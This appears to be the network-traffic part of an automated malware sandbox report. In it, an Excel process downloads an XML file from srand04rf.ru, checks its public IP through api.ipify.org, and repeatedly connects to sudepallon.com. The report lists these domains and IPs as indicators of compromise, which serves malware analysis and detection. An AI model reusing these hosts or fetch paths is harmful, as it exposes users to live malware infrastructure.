                                                                                                                                                  Jul 8, 2021 16:32:05.233257055 CEST804978577.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:05.246893883 CEST804978577.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:05.247066975 CEST4978580192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:05.514045000 CEST4978580192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:05.515065908 CEST4978680192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:05.567147970 CEST804978677.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:05.567255020 CEST4978680192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:05.567452908 CEST804978577.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:05.567543983 CEST4978580192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:05.567929029 CEST4978680192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:05.620114088 CEST804978677.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:05.634110928 CEST804978677.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:05.634191990 CEST4978680192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:05.935904026 CEST4978680192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:05.936942101 CEST4978780192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:05.988723040 CEST804978677.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:05.988862991 CEST4978680192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:05.989075899 CEST804978777.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:05.989248991 CEST4978780192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:05.990741968 CEST4978780192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:06.043019056 CEST804978777.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:06.056196928 CEST804978777.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:06.056324959 CEST4978780192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:06.512029886 CEST4978780192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:06.513310909 CEST4978880192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:06.568272114 CEST804978777.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:06.569840908 CEST804978877.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:06.569895029 CEST4978780192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:06.569931984 CEST4978880192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:06.570564985 CEST4978880192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:06.627269983 CEST804978877.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:06.643687010 CEST804978877.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:06.646730900 CEST4978880192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:06.977051020 CEST4978880192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:06.978594065 CEST4978980192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:07.035033941 CEST804978877.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:07.035907030 CEST804978977.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:07.036082983 CEST4978880192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:07.036137104 CEST4978980192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:07.036962032 CEST4978980192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:07.093199015 CEST804978977.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:07.106313944 CEST804978977.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:07.106985092 CEST4978980192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:07.768393993 CEST4978980192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:07.769948959 CEST4979080192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:07.822273016 CEST804978977.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:07.822295904 CEST804979077.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:07.822515011 CEST4978980192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:07.822664022 CEST4979080192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:07.823514938 CEST4979080192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:07.876522064 CEST804979077.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:07.890404940 CEST804979077.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:07.890535116 CEST4979080192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:08.153208017 CEST4979080192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:08.154428959 CEST4979180192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:08.207881927 CEST804979077.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:08.208059072 CEST4979080192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:08.210481882 CEST804979177.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:08.210676908 CEST4979180192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:08.232155085 CEST4979180192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:08.289072990 CEST804979177.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:08.301796913 CEST804979177.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:08.301964045 CEST4979180192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:08.856884003 CEST4979180192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:08.858016014 CEST4979280192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:08.910681009 CEST804979277.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:08.910805941 CEST4979280192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:08.911281109 CEST4979280192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:08.911609888 CEST804979177.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:08.911721945 CEST4979180192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:08.964246988 CEST804979277.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:08.978708029 CEST804979277.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:08.978818893 CEST4979280192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:09.228688955 CEST4979280192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:09.230237961 CEST4979380192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:09.282715082 CEST804979277.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:09.282855034 CEST4979280192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:09.284565926 CEST804979377.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:09.284729004 CEST4979380192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:09.286073923 CEST4979380192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:09.338244915 CEST804979377.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:09.355176926 CEST804979377.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:09.355365038 CEST4979380192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:09.603651047 CEST4979380192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:09.605942011 CEST4979480192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:09.657682896 CEST804979377.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:09.657763958 CEST4979380192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:09.661021948 CEST804979477.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:09.661123991 CEST4979480192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:09.661709070 CEST4979480192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:09.716578007 CEST804979477.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:09.730118990 CEST804979477.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:09.730317116 CEST4979480192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:09.990187883 CEST4979480192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:10.002593994 CEST4979580192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:10.046655893 CEST804979477.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:10.046801090 CEST4979480192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:10.058552027 CEST804979577.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:10.058734894 CEST4979580192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:10.059182882 CEST4979580192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:10.114506960 CEST804979577.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:10.127449989 CEST804979577.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:10.127593994 CEST4979580192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:10.377461910 CEST4979580192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:10.380247116 CEST4979680192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:10.431025028 CEST804979577.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:10.431195021 CEST4979580192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:10.432945967 CEST804979677.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:10.433163881 CEST4979680192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:10.434488058 CEST4979680192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:10.487174988 CEST804979677.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:10.502567053 CEST804979677.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:10.502739906 CEST4979680192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:10.742090940 CEST4979680192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:10.743561983 CEST4979780192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:10.794579983 CEST804979677.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:10.794795990 CEST4979680192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:10.796081066 CEST804979777.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:10.796235085 CEST4979780192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:10.798916101 CEST4979780192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:10.851476908 CEST804979777.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:10.867554903 CEST804979777.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:10.867810011 CEST4979780192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:11.100192070 CEST4979780192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:11.101713896 CEST4979880192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:11.154808998 CEST804979777.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:11.154975891 CEST4979780192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:12.559669971 CEST804979877.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:12.562772036 CEST4979880192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:12.563224077 CEST4979880192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:12.617768049 CEST804979877.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:12.632021904 CEST804979877.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:12.634275913 CEST4979880192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:12.885900021 CEST4979880192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:12.887197971 CEST4979980192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:12.939713955 CEST804979977.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:12.939743042 CEST804979877.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:12.941365004 CEST4979880192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:12.942588091 CEST4979980192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:12.942617893 CEST4979980192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:12.994925022 CEST804979977.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:13.008268118 CEST804979977.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:13.010777950 CEST4979980192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:13.262774944 CEST4979980192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:13.264075041 CEST4980080192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:13.315301895 CEST804979977.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:13.315639973 CEST4979980192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:13.319425106 CEST804980077.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:13.319683075 CEST4980080192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:13.320719004 CEST4980080192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:13.375287056 CEST804980077.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:13.388214111 CEST804980077.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:13.388403893 CEST4980080192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:13.632649899 CEST4980080192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:13.634596109 CEST4980180192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:13.687375069 CEST804980077.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:13.687539101 CEST4980080192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:13.689146042 CEST804980177.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:13.689290047 CEST4980180192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:13.690525055 CEST4980180192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:13.748176098 CEST804980177.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:13.764219046 CEST804980177.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:13.765355110 CEST4980180192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:14.021364927 CEST4980280192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:14.021368980 CEST4980180192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:14.075417042 CEST804980277.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:14.075612068 CEST4980280192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:14.077658892 CEST804980177.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:14.077763081 CEST4980180192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:14.084805965 CEST4980280192.168.2.377.222.42.67
                                                                                                                                                  Jul 8, 2021 16:32:14.139041901 CEST804980277.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:14.151746035 CEST804980277.222.42.67192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:32:14.153836012 CEST4980280192.168.2.377.222.42.67

                                                                                                                                                  UDP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Jul 8, 2021 16:29:53.564768076 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:29:53.578222990 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:29:54.178376913 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:29:54.192507982 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:29:54.824332952 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:29:54.838404894 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:29:55.835694075 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:29:55.848789930 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:29:56.741254091 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:29:56.755331039 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:29:57.480906010 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:29:57.497735023 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:29:59.299197912 CEST5934953192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:29:59.313008070 CEST53593498.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:00.503516912 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:30:00.516273975 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:01.344029903 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:30:01.356662989 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:08.551011086 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:30:08.612201929 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:08.898909092 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:30:08.937540054 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:09.381835938 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:30:09.690469027 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:09.912703991 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:30:09.927294016 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:13.134540081 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:30:13.147902012 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:14.911003113 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:30:14.924371958 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:15.634979010 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:30:15.648191929 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:16.993629932 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:30:17.006740093 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:18.653445959 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:30:18.667047024 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:19.314007044 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:30:19.327969074 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:21.062259912 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:30:21.078854084 CEST53565798.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:21.765441895 CEST6063353192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:30:21.778531075 CEST53606338.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:21.855720043 CEST6129253192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:30:21.870990038 CEST53612928.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:30.737751961 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:30:30.759521961 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:49.591932058 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:30:49.628288031 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:52.060528994 CEST6194653192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:30:52.076414108 CEST53619468.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:55.887640953 CEST6491053192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:30:55.906641960 CEST53649108.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:57.862971067 CEST5212353192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:30:58.155386925 CEST53521238.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:27.690449953 CEST5613053192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:31:27.718674898 CEST53561308.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:41.349364996 CEST5633853192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:31:41.383874893 CEST53563388.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:44.151695967 CEST5942053192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:31:44.173644066 CEST53594208.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:52.775281906 CEST5878453192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:31:52.788335085 CEST53587848.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:53.091214895 CEST6397853192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:31:53.451231003 CEST53639788.8.8.8192.168.2.3

                                                                                                                                                  DNS Queries

                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                  Jul 8, 2021 16:30:09.381835938 CEST192.168.2.38.8.8.80xdd4dStandard query (0)srand04rf.ruA (IP address)IN (0x0001)
                                                                                                                                                  Jul 8, 2021 16:30:57.862971067 CEST192.168.2.38.8.8.80x7e19Standard query (0)srand04rf.ruA (IP address)IN (0x0001)
                                                                                                                                                  Jul 8, 2021 16:31:52.775281906 CEST192.168.2.38.8.8.80xdfcbStandard query (0)api.ipify.orgA (IP address)IN (0x0001)
                                                                                                                                                  Jul 8, 2021 16:31:53.091214895 CEST192.168.2.38.8.8.80x6ae3Standard query (0)sudepallon.comA (IP address)IN (0x0001)

                                                                                                                                                  DNS Answers

                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                  Jul 8, 2021 16:30:09.690469027 CEST8.8.8.8192.168.2.30xdd4dNo error (0)srand04rf.ru8.211.241.0A (IP address)IN (0x0001)
                                                                                                                                                  Jul 8, 2021 16:30:58.155386925 CEST8.8.8.8192.168.2.30x7e19No error (0)srand04rf.ru8.211.241.0A (IP address)IN (0x0001)
                                                                                                                                                  Jul 8, 2021 16:31:52.788335085 CEST8.8.8.8192.168.2.30xdfcbNo error (0)api.ipify.orgnagano-19599.herokussl.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Jul 8, 2021 16:31:52.788335085 CEST8.8.8.8192.168.2.30xdfcbNo error (0)nagano-19599.herokussl.comelb097307-934924932.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Jul 8, 2021 16:31:52.788335085 CEST8.8.8.8192.168.2.30xdfcbNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.173.155A (IP address)IN (0x0001)
                                                                                                                                                  Jul 8, 2021 16:31:52.788335085 CEST8.8.8.8192.168.2.30xdfcbNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.235.175.90A (IP address)IN (0x0001)
                                                                                                                                                  Jul 8, 2021 16:31:52.788335085 CEST8.8.8.8192.168.2.30xdfcbNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.19.92.227A (IP address)IN (0x0001)
                                                                                                                                                  Jul 8, 2021 16:31:52.788335085 CEST8.8.8.8192.168.2.30xdfcbNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.235.121.178A (IP address)IN (0x0001)
                                                                                                                                                  Jul 8, 2021 16:31:52.788335085 CEST8.8.8.8192.168.2.30xdfcbNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.243.175.83A (IP address)IN (0x0001)
                                                                                                                                                  Jul 8, 2021 16:31:52.788335085 CEST8.8.8.8192.168.2.30xdfcbNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.16.246.238A (IP address)IN (0x0001)
                                                                                                                                                  Jul 8, 2021 16:31:52.788335085 CEST8.8.8.8192.168.2.30xdfcbNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.235.190.106A (IP address)IN (0x0001)
                                                                                                                                                  Jul 8, 2021 16:31:52.788335085 CEST8.8.8.8192.168.2.30xdfcbNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.16.226.23A (IP address)IN (0x0001)
                                                                                                                                                  Jul 8, 2021 16:31:53.451231003 CEST8.8.8.8192.168.2.30x6ae3No error (0)sudepallon.com77.222.42.67A (IP address)IN (0x0001)

                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                  • srand04rf.ru
                                                                                                                                                  • api.ipify.org
                                                                                                                                                  • sudepallon.com

                                                                                                                                                  HTTP Packets

                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  0192.168.2.3497248.211.241.080C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:30:09.727418900 CEST253OUTGET /92375234.xml HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Host: srand04rf.ru
                                                                                                                                                  Jul 8, 2021 16:30:09.811278105 CEST255INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:30:09 GMT
                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                  Content-Length: 8419
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Last-Modified: Thu, 08 Jul 2021 14:19:40 GMT
                                                                                                                                                  ETag: "60e7097c-20e3"
                                                                                                                                                  Accept-Ranges: bytes
